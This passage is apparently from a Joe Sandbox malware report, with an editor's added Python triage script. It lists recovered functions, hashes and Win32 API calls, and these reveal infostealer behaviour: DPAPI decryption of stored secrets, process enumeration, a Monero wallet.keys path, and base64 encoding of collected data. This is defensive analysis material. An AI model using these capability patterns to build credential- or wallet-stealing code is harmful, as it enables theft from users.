                              • Opcode ID: 46bdf50ab7c18b30b35b076719582bead56780d9bee5e1f803f59544e1a20900
                              • Instruction ID: 44936d24f94b4dd564f512784812747ab8c4c5fd566a21fdbcf089bc37248029
                              • Opcode Fuzzy Hash: 46bdf50ab7c18b30b35b076719582bead56780d9bee5e1f803f59544e1a20900
                              • Instruction Fuzzy Hash: 19122572A101189ADB18FB70DE96EEE7378AF64300F404599B51AB7091EF346F49CF92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $q;c$B~[$uI<u${lgw$68>$}m
                              • API String ID: 0-578503082
                              • Opcode ID: 36c1338a8b17650ce7466a67a24eccac62e36711c0ac8e636be97eeb3989790c
                              • Instruction ID: 79f86aa7a8dba1d952a1910180b00bce703af730a9821c370f5e2418bae03b8d
                              • Opcode Fuzzy Hash: 36c1338a8b17650ce7466a67a24eccac62e36711c0ac8e636be97eeb3989790c
                              • Instruction Fuzzy Hash: 21B218F3A082009FE304AE2DDC8567AFBE9EF94720F16463DEAC5D3744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @%~#$Wr~$Zao$^<^$bbo_$Pwm
                              • API String ID: 0-3198876897
                              • Opcode ID: 4ec7c66a33b361faa1a872591eb654c8e723258bf935e8e317187c669c53d0b7
                              • Instruction ID: f211468456fb67b0662b093ca110c225abcddaa2d408974bc62327dbd35f3995
                              • Opcode Fuzzy Hash: 4ec7c66a33b361faa1a872591eb654c8e723258bf935e8e317187c669c53d0b7
                              • Instruction Fuzzy Hash: 5EB208F360C204AFE7046E2DEC8567ABBE5EF94720F1A893DE6C4C3744E63598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #us$?u#p$Pg$bKK$DZ$_~
                              • API String ID: 0-1675584353
                              • Opcode ID: d735c56dc20da3782bafb7d682e3f34c0a78d02609210437684b4be94817e43a
                              • Instruction ID: 61f102032884b46e3fab5b53738f3b31a959a8eb44b5e541b9fa30f44d625032
                              • Opcode Fuzzy Hash: d735c56dc20da3782bafb7d682e3f34c0a78d02609210437684b4be94817e43a
                              • Instruction Fuzzy Hash: 73B2F9F390C204AFE3046E29EC8567AFBE9EF94720F1A4A3DE6C4C3744E63558458697
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A5C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A5C87C
                              • lstrcat.KERNEL32(?,00A70B46), ref: 00A5C943
                              • lstrcat.KERNEL32(?,00A70B47), ref: 00A5C957
                              • lstrcat.KERNEL32(?,00A70B4E), ref: 00A5C978
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: b1dc5cc2d6b69406d4340d1aec32488eb7444be103dcd9e95c8e647887dd39b7
                              • Instruction ID: a582be708bf770b65d037e47de9e595be6ecc6eefd0b88ae765634868aad67f6
                              • Opcode Fuzzy Hash: b1dc5cc2d6b69406d4340d1aec32488eb7444be103dcd9e95c8e647887dd39b7
                              • Instruction Fuzzy Hash: 8B413BB590421AEFCB10DFA4DD89BEEB7B8BB88704F1045A9F509A7280D7745B84CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A5724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A57254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A57281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A572A4
                              • LocalFree.KERNEL32(?), ref: 00A572AE
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 9e564869b81cc02a88719da953cd93cabbfa2ed5f99ae5dfa8349212badb5974
                              • Instruction ID: 6eaa4bbf014fad3cf82b965e9c6a9cb7cceba81671c28052dcf85410e9da719d
                              • Opcode Fuzzy Hash: 9e564869b81cc02a88719da953cd93cabbfa2ed5f99ae5dfa8349212badb5974
                              • Instruction Fuzzy Hash: D4011275A40208BBDB10DFD4DD4AF9E7778FB44705F108155FB05BB2C0D670AA008BA9
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A6961E
                              • Process32First.KERNEL32(00A70ACA,00000128), ref: 00A69632
                              • Process32Next.KERNEL32(00A70ACA,00000128), ref: 00A69647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00A6965C
                              • CloseHandle.KERNEL32(00A70ACA), ref: 00A6967A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 6e76dcdb02bd9f333bc1ac87e59352541d9e1d67e26c14bb5950fbad2d205c47
                              • Instruction ID: 6984363cb495da08e42685d9118ea951591a60251380957be6ffc216041eabde
                              • Opcode Fuzzy Hash: 6e76dcdb02bd9f333bc1ac87e59352541d9e1d67e26c14bb5950fbad2d205c47
                              • Instruction Fuzzy Hash: 28011E79A00308EBCB15DFA5CD48BEEB7FDEB48300F104189A90697280DB749B40CF91
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A705B7), ref: 00A686CA
                              • Process32First.KERNEL32(?,00000128), ref: 00A686DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00A686F3
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • CloseHandle.KERNEL32(?), ref: 00A68761
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 5ce326b6f6527cc8d3571cffb03a437326c9e8e0e24e350d695a23a6a75d99b5
                              • Instruction ID: d822600af2fc09ef6b5c65a7593ba36692f0ee39b99e3dd7d48747411e7abef3
                              • Opcode Fuzzy Hash: 5ce326b6f6527cc8d3571cffb03a437326c9e8e0e24e350d695a23a6a75d99b5
                              • Instruction Fuzzy Hash: 3C313972901218ABCB24DF95CD45FEEB778EF55700F108699B50AB21A0DF346A45CFA2
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00A55184,40000001,00000000,00000000,?,00A55184), ref: 00A68EC0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 68bba701e41466c395e15b5d2a13db00645219afb429ba166d2c20c3d4d3861d
                              • Instruction ID: 2ec3c7267a61558b4d46c4d5d431f1fc2bb9212d6ffd57616226cc5b62d6be09
                              • Opcode Fuzzy Hash: 68bba701e41466c395e15b5d2a13db00645219afb429ba166d2c20c3d4d3861d
                              • Instruction Fuzzy Hash: CD11E874200209BFDB00CFA4D899FAB37BDAF89714F109658F9198B250DB79ED41DB64
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                              • LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 1346a80cebea2282ca0f031e694034574d4a6fb2e53eba76bfa2ecf77ce966a8
                              • Instruction ID: 819f5690017e1d8690211eb604dec7c04afe8e1b66ca59729ebdb88df1fd5698
                              • Opcode Fuzzy Hash: 1346a80cebea2282ca0f031e694034574d4a6fb2e53eba76bfa2ecf77ce966a8
                              • Instruction Fuzzy Hash: B2119FB4240208EFEB10CF64D899FAA77A5FB89701F208059FD199F290C6B6A901CB94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A70E00,00000000,?), ref: 00A679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00A70E00,00000000,?), ref: 00A679C4
                              • wsprintfA.USER32 ref: 00A679F3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 69d21e1dd80024d8562bf01790fba5dd9b8682edb25288e7129e08a81ba1fc95
                              • Instruction ID: db865b56c88a4d7d0ac18ac83b82c2d10db43910f0940cd7942b28f74ebbc109
                              • Opcode Fuzzy Hash: 69d21e1dd80024d8562bf01790fba5dd9b8682edb25288e7129e08a81ba1fc95
                              • Instruction Fuzzy Hash: 691139B2904118ABCB14DFCADD49BBEB7F8FB4CB11F10425AF605A2280E7395940CBB5
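                               The function entries on this page list, for each recovered function, the Win32 calls it makes and the stack arguments Joe Sandbox observed at the call site. Read as call sequences they already describe the sample's capabilities: CryptStringToBinaryA followed by lstrcat rebuilds strings from base64; CryptUnprotectData followed by WideCharToMultiByte decrypts DPAPI-protected blobs of the kind browsers use for saved logins; CreateToolhelp32Snapshot, Process32First and Process32Next with StrCmpCA walk the process list and compare names; the subcall that references \Monero\wallet.keys builds a wallet file path; CryptBinaryToStringA with dwFlags 40000001 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF) encodes collected data as one base64 line; and GetLocalTime and GetTimeZoneInformation with wsprintfA format the victim's clock and time zone. The argument lists are a stack snapshot, not decoded prototypes: the "GetProcessHeap(00000008,00000400)" entries actually show the HEAP_ZERO_MEMORY flag and 0x400 size pushed for the following RtlAllocateHeap, so only values at documented flag positions should be interpreted.

                               The Python script below is an added example by the editor, not part of this report or of Joe Sandbox. It parses API lines copied verbatim from the entries above, decodes the flag arguments whose positions are unambiguous (TH32CS_SNAPPROCESS, sizeof(PROCESSENTRY32) = 0x128 for the ANSI structure, CRYPT_STRING_* bits, CRYPTPROTECT_UI_FORBIDDEN, LMEM_ZEROINIT) and tags each function with a capability label. The rule table, label wording and ATT&CK technique references are the editor's own assumptions, chosen for triage rather than taken from the report.

```python
# Added example (not part of the report or of Joe Sandbox): parse the per-function
# "APIs" lines of a Joe Sandbox report and label each function's capability.
import re

# Sample input copied verbatim from the "APIs" sections of this report (one string
# per function); raw strings keep the "\Monero\wallet.keys" argument intact.
REPORT_BLOCKS = [
    r"""• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A5C87C
• lstrcat.KERNEL32(?,00A70B46), ref: 00A5C943""",
    r"""• GetProcessHeap.KERNEL32(00000008,00000400), ref: 00A5724D
• RtlAllocateHeap.NTDLL(00000000), ref: 00A57254
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A57281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00A572A4
• LocalFree.KERNEL32(?), ref: 00A572AE""",
    r"""• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A6961E
• Process32First.KERNEL32(00A70ACA,00000128), ref: 00A69632
• Process32Next.KERNEL32(00A70ACA,00000128), ref: 00A69647
• StrCmpCA.SHLWAPI(?,00000000), ref: 00A6965C
• CloseHandle.KERNEL32(00A70ACA), ref: 00A6967A""",
    r"""• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A705B7), ref: 00A686CA
• Process32First.KERNEL32(?,00000128), ref: 00A686DE
• Process32Next.KERNEL32(?,00000128), ref: 00A686F3
  • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
• CloseHandle.KERNEL32(?), ref: 00A68761""",
    r"""• CryptBinaryToStringA.CRYPT32(00000000,00A55184,40000001,00000000,00000000,?,00A55184), ref: 00A68EC0""",
    r"""• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
• LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
• LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F""",
    r"""• GetLocalTime.KERNEL32(?,?,?,?,?,00A70E00,00000000,?), ref: 00A679C4
• wsprintfA.USER32 ref: 00A679F3""",
    r"""• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0144EC28,00000000,?,00A70E10,00000000,?,00000000,00000000,?), ref: 00A67A7D
• wsprintfA.USER32 ref: 00A67AB7""",
]

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Flag argument per API as (argument index, {bit: name}). The report prints a stack
# snapshot, so only the documented flag position of each prototype is interpreted.
FLAG_TABLE = {
    "CreateToolhelp32Snapshot": (0, {0x2: "TH32CS_SNAPPROCESS"}),
    "Process32First": (1, {0x128: "sizeof(PROCESSENTRY32)"}),
    "Process32Next": (1, {0x128: "sizeof(PROCESSENTRY32)"}),
    "CryptStringToBinaryA": (2, {0x1: "CRYPT_STRING_BASE64"}),
    "CryptBinaryToStringA": (2, {0x1: "CRYPT_STRING_BASE64", 0x40000000: "CRYPT_STRING_NOCRLF"}),
    "CryptUnprotectData": (5, {0x1: "CRYPTPROTECT_UI_FORBIDDEN"}),
    "LocalAlloc": (0, {0x40: "LMEM_ZEROINIT (LPTR)"}),
}
# Editor's own capability rules: required API set -> label (ATT&CK technique).
RULES = [
    ({"CryptUnprotectData"}, "DPAPI unprotect of stored secrets (T1555.003)"),
    ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}, "process enumeration (T1057)"),
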